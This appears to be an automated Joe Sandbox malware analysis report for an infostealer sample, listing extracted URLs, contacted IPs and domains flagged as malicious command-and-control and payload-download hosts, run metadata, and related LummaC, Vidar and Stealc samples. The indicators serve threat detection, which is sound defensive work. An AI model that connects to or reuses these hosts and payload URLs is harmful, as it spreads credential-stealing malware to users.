https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, BKKFCFBKFC.exe, 00000011.00000002.1990889383.000000000431B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipi4	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	DHCAEC.6.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/765611997804188691	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.CBAFCF	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
https://stogeneratmns.shop/	RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.entrust.net/rpa03	file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	false	URL Reputation: safe	unknown
https://hansgborn.eu/receiL	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ghostreedmnu.shop/v	RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	EHJDGC.6.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	EHJDGC.6.dr	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://5.75.211.162pData	RegAsm.exe, 00000013.00000002.2453119185.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000045D000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	false	Avira URL Cloud: safe	unknown
http://api.ipify86z	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162KJEHD	RegAsm.exe, 00000013.00000002.2453119185.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869&nX	RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://5.75.211.16214d953f2846xe	RegAsm.exe, 00000013.00000002.2453119185.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://offensivedzvju.shop/	RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.c	RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/freebl3.dlll	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dllf	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	RDPWInst.exe, 0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	EHJDGC.6.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162IDGCB	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/lG	RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:27060	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reinforcenh.shop/os%P	RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
http://hansgborn.eu	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	false	URL Reputation: safe	unknown
https://5.75.211.1620.5938.134	RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.orgFCF	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	false	Avira URL Cloud: safe	unknown
https://player.vimeo.com	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.ipify.orgd	CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035DF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/nss3.dlla	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/nss3.dllz	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.77.130	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.67.132.32	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	stogeneratmns.shop	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.128.144	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true
172.67.194.216	wallkedsleeoi.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519866
Start date and time:	2024-09-27 01:36:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@65/45@16/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
21:08:49	API Interceptor	3x Sleep call for process: RegAsm.exe modified
21:10:10	API Interceptor	1x Sleep call for process: CFHIIEHJKK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.77.130	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
104.26.12.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
